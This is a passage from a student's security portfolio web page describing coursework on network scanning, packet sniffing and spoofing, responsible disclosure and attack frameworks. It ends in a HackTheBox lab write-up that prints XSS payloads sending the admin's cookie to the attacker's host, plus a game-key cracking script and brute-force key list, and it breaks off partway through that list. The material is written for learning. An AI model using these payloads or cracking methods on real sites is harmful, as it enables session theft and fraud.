          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
          it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
           <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
          number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
